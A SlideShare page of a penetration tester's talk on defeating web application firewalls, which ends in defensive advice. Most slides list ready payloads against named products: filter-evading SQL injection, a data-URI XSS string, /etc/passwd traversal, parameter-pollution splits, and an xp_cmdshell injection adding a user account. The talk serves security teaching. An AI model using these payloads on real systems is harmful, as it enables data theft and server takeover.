SlideShare une entreprise Scribd logo

Introduction to Web Application Firewall (WAF

Prathan Phongthiproek
Prathan Phongthiproek

Breach WAF with advanced techniques

1  sur  44
Télécharger pour lire hors ligne
Web Application Firewall (WAF) Suckseed or Succeed !? Mr.Prathan Phongthiproek Consulting Manager, Red Team ACIS Professional Center
Who am I ? ACIS Professional Center Manager of the Red Team Specializing in Attack & Penetration Information Security Consulting Manager Instructor and Speaker Founder of CWH Underground Hacker Aka 0x7a657133756c
Let’s Reveal Introduction to Web Application Firewall (WAF) Breach it !! Filter Evasion HTTP Parameter Contamination HTTP Pollution: Split and Join Conclusion
Introduction to Web Application Firewall (WAF)
Web Application Hacking 7 of 10 sites are vulnerable 70% of Cyber attacks are on web ports 95% of companies are hacked through web ports Anonymous and Lulzsec Hacker with Operation #AntiSec
Web Application Hacking Top 3 Web App Attacks Cross Site Scripting File Inclusion (Remote/Local) SQL Injection (Normal/Blind/Time based/Regex...)
Misunderstand for Harden Web Application
What’s WAF ? Emerged from IDS/IPS focused on HTTP protocol and HTTP related attacks Usually contain a lot of complex reg-exp rules to match (Blacklist) For most WAF vendors they are “Closely guarded secrets” Open-source WAFs (Mod_security and PHPIDS) have open source rules
Understand Blacklist
Detection and Protection SQL Injection Cross Site Scripting Local and Remote File Inclusion Code/Command Injection Directory Traversal Buffer Overflow Cookie Poisoning Parameter Tampering Upload File Mis-Handling Information Disclosure Etc...
WAFs Vendors Armorize Bee-ware Barracuda BinarySec Cisco ACE Mod Security Citrix Netscaler WebKnight F5 DenyAll Imperva SecureSphere Fortify Radware Appwall Visonys Profense Pentasecurity Other..
WAF implementation
Breach it !! (CMS and WAFs) “เอาอยู่ เอาอย.......แตกแล้ว” ู่
Filter Evasion (SQLi) PHP: Magic_quote On, Mysql_real_escape_string, Addslashes ‘ “ -> ’ ” id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’
Filter Evasion (SQLi) PHP: Magic_quote On, Mysql_real_escape_string, Addslashes ‘ “ -> ’ ” id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
Filter Evasion (SQLi) PHP: Magic_quote On, Mysql_real_escape_string, Addslashes String to ASCII id=1 and 1=2 union select 1,load_file(CHAR (47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102 ,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
Filter Evasion (SQLi) Comments //,--,/**/,/*,#,%00 id=1+un/**/ion+se/**/lect+1,2,3-- Case Changing (lower case) /unionsselect/g id=1+UnIoN/**/SeLecT/**/1,2,3-- Replaced keywords id=1+UnunionIoN+SeselectLecT+1,2,3--
Filter Evasion (SQLi) Case Study: NukeSentinel (PHP Nuke) Encode to Hex Forbidden: http://victim.com/php-nuke/?/**/union/**/select....... Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select....... Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
Filter Evasion (SQLi) Buffer Overflow (For C language) id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT +1,version(),3,database(),user(),6,7,8,9,10--
Filter Evasion (SQLi) Inline Comments (/*!......*/) A lot of WAFs was bypassed Bypass IPS and Timeout MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/ comments.html) /unionsselect/ig id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/) +FrOm/*!information_schema*/.tables/*!WhErE*/+/*! TaBlE_sChEMa*/+like+database()--
Filter Evasion (SQLi) Inline Comments (/*!......*/)
Filter Evasion (SQLi) Censor
Filter Evasion (SQLi) Other Bypasses: and -> && or -> || = -> like substring() -> substr(), mid(), strcmp() ascii() -> hex(), bin(), char(), ord() benchmark() -> sleep() Whitespace -> (),/**/,%0b isnull, between
Filter Evasion (SQLi) Case Study: PHPIDS
Filter Evasion (SQLi) Case Study: PHPIDS
Filter Evasion (SQLi) Case Study: PHPIDS
Filter Evasion (SQLi) Case Study: Mod Security CRS SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "bunionb.{1,100}?bselectb" "phase2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase ,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/ WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/ 6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.sql_injection_score=+% {tx.critical_anomaly_score},setvar:tx.anomaly_score=+% {tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-% {matched_var_name}=%{tx.0}"
Filter Evasion (SQLi) Case Study: Mod Security CRS http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect %23foo%0D%0A1%2C2%2Ccurrent_user 0 div 1 union#foo*/*bar select#foo 1,2,current_user 0 div 1 union select 1,2,current_user
Filter Evasion Cross Site Scripting (XSS) Forbidden: http://victim.com/search.php?q=javascript:alert('XSS') Bypass: http://victim.com/search.php?q=data:text/ html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4= File Inclusion Forbidden: http://victim.com/download.php?file=../../../etc/passwd Bypass: http://victim.com/download.php?file=../../../etc/passwd.......... Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../ passwd
HTTP Parameter Contamination
HTTP Parameter Contamination Bypass Mod_Security SQLi rule (modsecurity_crs_41) Bypass URLScan 3.1 DenyQueryStringSequences rules Bypass AQTRONIX Webknight WAF with “%”
HTTP Parameter Contamination Case Study: AQTRONIX Webknight http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables) 10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables) 10 and 1=0/(select top 1 table_name from information_schema.tables)
HTTP Pollution: Split and Join HPP is a quite simple but effective hacking technique HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string Focus on ASP/ASP.net A lot of WAF was bypassed
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join Basic Attack Forbidden:http://victim.com/search.aspx?q=select name,password from user Bypass:http://victim.com/search.aspx?q=select name&q=password from user q=select name q=password from user q=select name,password from user
HTTP Pollution: Split and Join HPP+Inline Comment (Bypass Commercial WAF) Forbidden:http://victim.com/search.aspx?q=select name,password from user Bypass:http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/ from/*&q=*/user q=select/* q=*/name q=password/* q=*/from/* q=*/user q=select/*,*/name,password/*,*/from/*,*/user q=select name,password from user
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join Case study: IBM Web Application Firewall (2011-6-21) Forbidden:http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT /add” -- Bypass:http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ -- id=1’; /* id=1*/ EXEC /* id=1*/ master..xp_cmdshell /* id=1*/ “net user lucifer UrWaFisShiT” /* id=1*/ -- id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user lucifer UrWaFisShiT” /*,1*/ -- id=1’; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT” --
“ประเทศไทยต้องการ ความเปลี่ยนแปลง ถึงเวลาที่ทุกคนใน ประเทศตื่นตัวได้แล้ว ความโง่เขลาจักต้องหมดสิ้นไป”
How to protect your website ? Implement Secure Software Development Life Cycle (SSDLC) Secure Coding: Validate all inputs and outputs Pentest before Online Harden it !! Re-visit Again Deploy WAF (Optional)
Conclusion WAF is not the long-expected It’s functional limitations, WAF is not able to protect a web app from all possible vulnerabilities It’s necessary to adapt WAF filter to the particular web app being protected WAF doesn’t eliminate a vulnerability, It just partly screens the attack vector It suckseed or succeed !? “Security Products not able to 100% protect from damn config/coding of admin. Just need a time and imagination for breach it !!”
Greetz To.. ACIS-Red Team Kyle Johannes Dahse Ahmad Maulana Luca Carettoni Stefano di Paola Ivan Markovic All WAF products that I breached

Recommandé

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
Web Application Firewall intro
Web Application Firewall introWeb Application Firewall intro
Web Application Firewall introRich Helton
 

Recommandé

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
Web Application Firewall intro
Web Application Firewall introWeb Application Firewall intro
Web Application Firewall introRich Helton
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2Zero Science Lab
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do sE Hacking
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafIMMUNIO
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managmentzakieh alizadeh
 
Comision negociadora convenio champion
Comision negociadora convenio championComision negociadora convenio champion
Comision negociadora convenio championoscargaliza
 
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...TDR d.o.o Rovinj
 

Contenu connexe

Tendances

CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2Zero Science Lab
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do sE Hacking
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafIMMUNIO
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 

Tendances (20)

CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do s
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs waf
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Secure code
Secure codeSecure code
Secure code
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security Tools
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managment
 

En vedette

Comision negociadora convenio champion
Comision negociadora convenio championComision negociadora convenio champion
Comision negociadora convenio championoscargaliza
 
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...TDR d.o.o Rovinj
 
Acta mediterranea de catering pontevedra
Acta mediterranea de catering pontevedraActa mediterranea de catering pontevedra
Acta mediterranea de catering pontevedraoscargaliza
 
21.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.0421.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.04El Alex Andrade
 
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultatiTDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultatiTDR d.o.o Rovinj
 
Sentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourenseSentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourenseoscargaliza
 
Fdisk אתר המדריכים של פורום חלונות
Fdisk אתר המדריכים של פורום חלונותFdisk אתר המדריכים של פורום חלונות
Fdisk אתר המדריכים של פורום חלונותhaimkarel
 
Sistemas De Apoio a Decisão
Sistemas De Apoio a DecisãoSistemas De Apoio a Decisão
Sistemas De Apoio a DecisãoWillame Tiberio
 
Acordo hesperia illa da toxa
Acordo hesperia illa da toxaAcordo hesperia illa da toxa
Acordo hesperia illa da toxaoscargaliza
 
Sana's group's presentation
Sana's group's presentationSana's group's presentation
Sana's group's presentationSana Samad
 
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)oscargaliza
 
BridgeAtMainALA2015
BridgeAtMainALA2015BridgeAtMainALA2015
BridgeAtMainALA2015mel gooch
 
Digital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint EditorDigital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint EditorDigital Animation for Kids, LLC
 
Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010oscargaliza
 

En vedette (20)

Comision negociadora convenio champion
Comision negociadora convenio championComision negociadora convenio champion
Comision negociadora convenio champion
 
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
 
Brukeroppførsel
BrukeroppførselBrukeroppførsel
Brukeroppførsel
 
Acta mediterranea de catering pontevedra
Acta mediterranea de catering pontevedraActa mediterranea de catering pontevedra
Acta mediterranea de catering pontevedra
 
21.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.0421.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.04
 
เศรษฐศาสตร์เบื้องต้น
เศรษฐศาสตร์เบื้องต้นเศรษฐศาสตร์เบื้องต้น
เศรษฐศาสตร์เบื้องต้น
 
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultatiTDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
 
Sentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourenseSentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourense
 
Fdisk אתר המדריכים של פורום חלונות
Fdisk אתר המדריכים של פורום חלונותFdisk אתר המדריכים של פורום חלונות
Fdisk אתר המדריכים של פורום חלונות
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
 
Sistemas De Apoio a Decisão
Sistemas De Apoio a DecisãoSistemas De Apoio a Decisão
Sistemas De Apoio a Decisão
 
Acordo hesperia illa da toxa
Acordo hesperia illa da toxaAcordo hesperia illa da toxa
Acordo hesperia illa da toxa
 
Sana's group's presentation
Sana's group's presentationSana's group's presentation
Sana's group's presentation
 
India Horizontal Plant
India Horizontal PlantIndia Horizontal Plant
India Horizontal Plant
 
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
BridgeAtMainALA2015
BridgeAtMainALA2015BridgeAtMainALA2015
BridgeAtMainALA2015
 
Digital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint EditorDigital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint Editor
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010
 

Similaire à Introduction to Web Application Firewall (WAF

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Technical Architecture of RASP Technology
Technical Architecture of RASP TechnologyTechnical Architecture of RASP Technology
Technical Architecture of RASP TechnologyPriyanka Aash
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsYan Cui
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 

Similaire à Introduction to Web Application Firewall (WAF (20)

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Virtually Pwned
Virtually PwnedVirtually Pwned
Virtually Pwned
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Technical Architecture of RASP Technology
Technical Architecture of RASP TechnologyTechnical Architecture of RASP Technology
Technical Architecture of RASP Technology
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
